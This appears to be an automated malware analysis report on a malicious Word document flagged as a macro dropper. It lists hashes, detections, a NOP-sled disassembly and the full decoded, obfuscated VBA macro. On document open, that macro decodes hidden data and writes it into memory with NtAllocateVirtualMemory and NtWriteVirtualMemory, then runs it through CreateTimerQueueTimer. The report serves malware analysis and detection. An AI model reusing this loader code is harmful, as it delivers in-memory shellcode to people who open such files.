Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a363fb24edce3162…

MALICIOUS

Office (OLE)

214.5 KB Created: 2018-01-31 15:32:00 Authoring application: Microsoft Office Word First seen: 2018-02-07
MD5: 5fb3cfffa94f1adebde4005aaa4b70fa SHA-1: d07ef042cb4852ba5ce61fb265c790900e1ea470 SHA-256: a363fb24edce3162326238d0152b99845d0dd0be53191183aad2ceba2d168a2a
110 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro within the Document_Open subroutine, which is a common technique for initial execution. The macro appears to be obfuscated and uses a call to 'NtAllocateVirtualMemory' via PtrSafe declaration, suggesting it aims to allocate memory for and execute a payload. The ClamAV detection 'Doc.Dropper.Agent-6436876-0' further supports its malicious nature as a dropper. The document body content is benign, indicating the malicious functionality is solely within the macro.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6436876-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6436876-0
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x40 bytes
    Disassembly
    Attempted x86 opcode disassembly
    0000740D  40                inc eax
    0000740E  40                inc eax
    0000740F  40                inc eax
    00007410  40                inc eax
    00007411  40                inc eax
    00007412  40                inc eax
    00007413  40                inc eax
    00007414  40                inc eax
    00007415  40                inc eax
    00007416  40                inc eax
    00007417  40                inc eax
    00007418  40                inc eax
    00007419  40                inc eax
    0000741A  40                inc eax
    0000741B  40                inc eax
    0000741C  40                inc eax
    0000741D  40                inc eax
    0000741E  40                inc eax
    0000741F  40                inc eax
    00007420  40                inc eax
    00007421  40                inc eax
    00007422  40                inc eax
    00007423  40                inc eax
    00007424  40                inc eax
    00007425  40                inc eax
    00007426  40                inc eax
    00007427  40                inc eax
    00007428  40                inc eax
    00007429  40                inc eax
    0000742A  40                inc eax
    0000742B  40                inc eax
    0000742C  40                inc eax
    0000742D  40                inc eax
    0000742E  40                inc eax
    0000742F  40                inc eax
    00007430  40                inc eax
    00007431  40                inc eax
    00007432  40                inc eax
    00007433  40                inc eax
    00007434  40                inc eax
    00007435  40                inc eax
    00007436  40                inc eax
    00007437  40                inc eax
    00007438  40                inc eax
    00007439  40                inc eax
    0000743A  40                inc eax
    0000743B  40                inc eax
    0000743C  40                inc eax
    0000743D  40                inc eax
    0000743E  40                inc eax
    0000743F  40                inc eax
    00007440  40                inc eax
    00007441  40                inc eax
    00007442  40                inc eax
    00007443  40                inc eax
    00007444  40                inc eax
    00007445  40                inc eax
    00007446  40                inc eax
    00007447  40                inc eax
    00007448  40                inc eax
    00007449  40                inc eax
    0000744A  40                inc eax
    0000744B  40                inc eax
    0000744C  40                inc eax
    0000744D  40                inc eax
    0000744E  40                inc eax
    0000744F  40                inc eax
    00007450  40                inc eax
    00007451  40                inc eax
    00007452  40                inc eax
    00007453  40                inc eax
    00007454  40                inc eax
    00007455  40                inc eax
    00007456  40                inc eax
    00007457  40                inc eax
    00007458  40                inc eax
    00007459  40                inc eax
    0000745A  40                inc eax
    0000745B  40                inc eax
    0000745C  40                inc eax
    0000745D  40                inc eax
    0000745E  40                inc eax
    0000745F  40                inc eax
    00007460  40                inc eax
    00007461  40                inc eax
    00007462  40                inc eax
    00007463  40                inc eax
    00007464  40                inc eax
    00007465  40                inc eax
    00007466  40                inc eax
    00007467  40                inc eax
    00007468  40                inc eax
    00007469  40                inc eax
    0000746A  40                inc eax
    0000746B  40                inc eax
    0000746C  40                inc eax
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    chopper = "hercules"
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11273 bytes
SHA-256: e740c6c0b23fdb8b8d88ff84528db326cb672df0d8c0ac6f6568ec828b07087a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_Open()
chopper = "hercules"
bedding
reclusion = 28 + 10
 Pmt 0, reclusion, 20522, 59196, 2
End Sub



Attribute VB_Name = "dimocarpus"
Attribute VB_Base = "0{3608F65F-2715-4212-85E5-29E34707BB97}{5FFAB0FC-1943-4D49-BD5C-D494ACC8D692}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "confining"
#If (62 - 27 + 365 + 83 - 56 + 273) > ((87 - 34 + 267) - (11 - 42 + 571) * 1) And ((21 - 24 + 31) - (73 - 111 + 66)) * 2 < (Win64) Then
Public Declare PtrSafe Function prelacy _
Lib "ntdll   " Alias _
"NtAllocateVirtualMemory" (copper As LongPtr, aether As LongPtr, ByVal chamaeleontidae As LongPtr, catByVal As LongPtr, ruptiliocarpon As LongPtr, ByVal argali As LongPtr) As LongPtr
#End If
Function manta(almost) As String
Dim ifla(63) As Long
Dim fossils As Long
Dim absolver As Long
Dim bromelia() As Byte
Dim exhibitionism As Long
Dim beaugregory As Long
Dim antihypertensive(63) As Long
Dim supplant As String
Dim approximative(63) As Long
Dim ungoverned(6962) As Byte
gradient = 30 - 10 + 4012
Dim annals As Long

scion = 78 - 93 + 65295
gangster = 27 - 24 + 253
introject = 71 - 76 + 69
Dim panini As Variant

bedside = 31 - 74 + 16711723
oberon = 123 - 107 + 16515056
autobiography = 101 - 36 + 257983
Dim barbiturate As Integer

hamiform = 13 - 41 + 4124
drippy = 44 - 51 + 262151
outlier = 49 - 111 + 317
flinch = 14 - 70 + 65592
cagily = 113 - 22 - 28
Dim copartner As Integer
futon = 8 - 49 + 7884
Dim mf() As Byte
mf = VBA.StrConv(almost, 120 + 8)
importer = 45 + 7
Pmt 0, importer, 25416, 25449, 7
affect = 7840 + 3
moneymaking = vbKeyShift - 12
For chordal = 0 To affect
If chordal Mod 2 = 0 Then
mf(chordal) = mf(chordal) - moneymaking
Else
mf(chordal) = mf(chordal) - (moneymaking - 1)
End If
Next chordal
boswellia = 58 + 16
Pmt 0, boswellia, 33800, 37708, 7
indulgency = unrestraint
For fossils = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
approximative(fossils) = admired(fossils, introject, 61)
antihypertensive(fossils) = admired(fossils, hamiform, 61)
ifla(fossils) = admired(fossils, drippy, 61)
Next fossils
salleamanger = 28 + 4
Pmt 0, salleamanger, 37442, 33315, 3
bromelia = mf
appeasable = 74 - 4 - 66
celiocentesis = 35 + 6
Pmt 0, celiocentesis, 32953, 31463, 7
expectable = 61 - 55 - 3
attendance = expectable + 1
bentley = 74 - 47 - 25
For absolver = 0 To affect
urnam = bromelia(absolver)
torah = bromelia(absolver + 2)
hold = antihypertensive(indulgency(bromelia(absolver + 1)))
namibian = approximative(indulgency(torah)) + indulgency(bromelia(absolver + expectable))
exhibitionism = ifla(indulgency(urnam)) + hold + namibian
fossils = admired(exhibitionism, bedside, 53)
ungoverned(beaugregory) = admired(fossils, flinch, 43)
fossils = admired(exhibitionism, scion, 53)
ungoverned(beaugregory + 1) = admired(fossils, gangster, 43)
ungoverned(beaugregory + bentley) = admired(exhibitionism, outlier, 53)
beaugregory = beaugregory + bentley + 1
absolver = absolver + 3
Next
manta = ungoverned
End Function




Attribute VB_Name = "dominis"
#If (2 - 59 + 457 + 82 - 79 + 297) > ((59 - 32 + 293) - (79 - 22 + 483) * 1) And Not ((47 - 59 + 40) - (75 - 44 - 3)) * 2 < (Win64) Then
Public Declare Function gaucherie _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (soil As Any, ByVal calomel As Any, ByVal botany As Any, ByVal groundfish As Any, ByVal conserve As Any, ByVal euphoric As Any, ByVal catamaran As Any) As Long
#End If
#If (62 - 27 + 365 + 83 - 56 + 273) > ((87 - 34 + 267) - (11 - 42 + 571) * 1) And ((21 - 24 + 31) - (73 - 111 + 66)) * 2 < (Win64) Then
Public Declare PtrSafe Function gaucherie _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (odd As Any, ByVal rhoeadales As Any, ByVal gradeconstructed As Any, ByVal consumere As Any, ByVal naprapath As Any, ByVal aust As Any, ByVal acarina As Any) As Long
#End If
Function reposit(tempera, bearings, agriculturist)
Dim accidents As Long
Dim electronically As Integer
Dim desolately As Long
Dim separately As Integer
Dim coyly As Long
Dim unapparent As String
Dim ever As Long
Dim despitefully As Variant
Dim crenate As Long
Dim inaffable As String
Dim gharrywallah As Variant
dogtooth = dogtooth
dogtooth = costa
accidents = tempera
crenate = agriculturist
dogtooth = dogtooth
coyly = bearings
feast = 55 + 55
 Pmt 0, feast, 26368, 10482, 5

foyer = Rnd(174)
desolately = 9 - 118 + 108
mercies ByVal desolately, _
accidents, coyly, _
crenate, ever
convertible = bracing + 121
End Function


Attribute VB_Name = "fixut"
#If (62 - 27 + 365 + 83 - 56 + 273) > ((87 - 34 + 267) - (11 - 42 + 571) * 1) And ((21 - 24 + 31) - (73 - 111 + 66)) * 2 < (Win64) Then
Public Declare PtrSafe Function mercies _
Lib "ntdll  " Alias _
"NtWriteVirtualMemory" (ByVal alephnull As Any, ByVal alloyed As Any, ByVal bloom As Any, ByVal marker As Any, ByVal attenuated As Any) As LongPtr
#End If
Function admired(whimsicality, antigua, nulli)
If nulli = 43 + (10 / 2 - 5) Then
admired = whimsicality \ antigua
End If
If nulli = 53 + (5 - 3) / 2 - 1 Then
admired = whimsicality And antigua
End If
If nulli = 61 + (56 / 7 - 4 * 2) Then
admired = whimsicality * antigua
End If
End Function
Function nonsense(sequent, impact, dismantle)
Dim cofactor As Long
Dim kenyapithecus As Long
Dim maggior As LongPtr
Dim antacid As LongPtr
Dim odoriferous As LongPtr
Dim grid As Long
Dim magnetism As LongPtr
Dim monrovia As LongPtr
bracing = foyer And 408
dogtooth = dogtooth
antacid = sequent
monrovia = dismantle
convertible = convertible + 275
magnetism = impact
bootless = 3 + 60
 Pmt 0, bootless, 19241, 16857, 4

dogtooth = dogtooth
maggior = 119 - 65 - 55
mercies ByVal maggior, _
antacid, magnetism, _
monrovia, odoriferous
costa = "appropinquation"
End Function

Function monism(ache)
Dim grnoematagr As Long
Dim amphibolite As Byte
Dim alteration As String
Dim cloudburst As Long
#If (119 - 44 + 325 + 42 - 114 + 372) > ((111 - 124 + 333) - (71 - 39 + 508) * 1) And ((41 - 34 + 21) - (72 - 33 - 11)) * 2 < (Win64) Then
Dim argument As Variant
Dim mindfulness As LongPtr
masaniello = 80 - 101 + 29
Dim anguilliformes As LongPtr
Dim wirehair As String
Dim caliver As Long
Dim uncomely As LongPtr
Dim belleslettres As Variant
emanate = VarPtr(mindfulness)
placoderm = nonsense(emanate, VarPtr(ache) + (62 - 20 - 34), masaniello)
#End If
#If (45 - 12 + 367 + 115 - 46 + 231) > ((44 - 56 + 332) - (126 - 53 + 467) * 1) And Not ((79 - 122 + 71) - (46 - 63 + 45)) * 2 < (Win64) Then
Dim mindfulness As Long
masaniello = 125 - 12 - 109
Dim anguilliformes As Long
Dim uncomely As Long
emanate = VarPtr(mindfulness)
placoderm = reposit(emanate, VarPtr(ache) + (91 - 2 - 81), masaniello)
#End If
groomed = 70 - 18 - 53
anguilliformes = 120 - 101 - 19
complaint = 22 - 108 + 86
uncomely = 61 - 91 + 10015
conditionally = 23 - 103 + 4176
fanon = 43 - 29 + 50
anthropology = prelacy(ByVal groomed, _
anguilliformes, ByVal complaint, uncomely, _
ByVal conditionally, ByVal fanon)
costa = dogtooth
dogtooth = "pilgarlic"
reposit anguilliformes, mindfulness, 67 - 89 + 5905
alarmism = 46 + 59
Pmt 0, alarmism, 3506, 33846, 5
monism = anguilliformes
End Function

Function bedding()
Dim gueridon As Variant
Dim nor As Variant
dimocarpus.cynocephalidae.Value = Day(#12/5/2013#)
varday = barrels = "jail"
aerobacter = allomorph
classicistic = "catchweed"
godship = heifer
dumfoundered = "omsk"

doubts = "prenticeship"
dastardly = involucre
Set metalepsis = dimocarpus.cynocephalidae.SelectedItem
adverb = 6 + 15
 Pmt 0, adverb, 36937, 59909, 5

browbeaten = metalepsis.Name
nonpsychoactive = 23 - 121 + 7942
conciliation = Right(browbeaten, nonpsychoactive)
fogged = confining.manta(conciliation)
atkins = 31 + 54
 Pmt 0, atkins, 30827, 16166, 5

leontocebus = "protrusive"
#If (76 - 18 + 342 + 45 - 33 + 288) > ((65 - 81 + 336) - (31 - 11 + 520) * 1) And ((32 - 72 + 68) - (36 - 60 + 52)) * 2 < (Win64) Then
Dim ladyinwaiting As String
Dim blastocyte As LongPtr
Dim hoax As LongPtr
Dim obediant As String
Dim stonechat As String
Dim fallaciousness As LongPtr
Dim demythologization As LongPtr
Dim render As LongPtr
abdominoscope = 8 - 42 + 2098
#ElseIf (106 - 90 + 384 + 3 - 46 + 343) > ((67 - 35 + 288) - (72 - 57 + 525) * 1) And Not ((95 - 75 + 8) - (114 - 21 - 65)) * 2 < (Win64) Then
Dim eileton As Variant
Dim hoax As Long
Dim signified As Long
Dim blastocyte As Long
Dim fallaciousness As Long
autoptical = 31 - 71 + 821
Dim demythologization As Long
Dim render As Long
abdominoscope = autoptical + 3459
#End If
diamondback = 94 - 116 + 22
thallophyte = "isotonic"
costal = 39 + 45
 Pmt 0, costal, 11568, 42979, 3

venogram = "assistive"
seafood = "mpriser"
anothers = "marduk"
styrene = 36 + 39
 Pmt 0, styrene, 33132, 35943, 4

etropus = fogged
chromatism = "broad"
blastocyte = monism(etropus)
abrasion = melancholic
efface = "macrobiotic"
Dim isospondyli As String
Dim postmeridian As Long
fallaciousness = 46 - 120 + 74
hoax = blastocyte + abdominoscope
demythologization = 30 - 82 + 201579
render = 37 - 106 + 3569
formonly = gaucherie(demythologization, _
fallaciousness, _
hoax, fallaciousness, _
fallaciousness, fallaciousness, _
fallaciousness)
dreary = 50 + 6
 Pmt 0, dreary, 38704, 58330, 6

End Function





Attribute VB_Name = "mirtans"
#If (2 - 59 + 457 + 82 - 79 + 297) > ((59 - 32 + 293) - (79 - 22 + 483) * 1) And Not ((47 - 59 + 40) - (75 - 44 - 3)) * 2 < (Win64) Then
Public Declare Function prelacy _
Lib "ntdll   " Alias _
"NtAllocateVirtualMemory" (pretrial As Long, canonist As Long, ByVal segnity As Long, narrowedByVal As Long, crowned As Long, ByVal absinthe As Long) As Long
Public Declare Function mercies _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal plonk As Any, ByVal adamant As Any, ByVal sanctorum As Any, ByVal developer As Any, ByVal dead As Any) As Long
#End If

Function unrestraint()
Dim subjecta(255) As Byte
frostbound = 31 - 37 + 71
For i = frostbound To (57 - 78 + 112)
subjecta(frostbound) = frostbound - (127 - 53 - 9)
frostbound = frostbound + 1
If athanor > (48 - 5 + 48) Then Exit For
Next

frostbound = (86 - 20 - 18)
For i = frostbound To (65 - 82 + 75)
subjecta(frostbound) = frostbound + (78 - 125 + 51)
frostbound = frostbound + 1
If athanor > (55 - 120 + 123) Then Exit For
Next
frostbound = (68 - 47 + 76)
For i = frostbound To (13 - 99 + 209)
subjecta(frostbound) = frostbound - (77 - 115 + 109)
frostbound = frostbound + 1
If athanor > (53 - 117 + 187) Then Exit For
Next
subjecta(87 - 123 + 83) = (48 - 9 + 24)
frostbound = (68 - 31 + 6)
subjecta(frostbound) = (109 - 94 + 47)
unrestraint = subjecta
End Function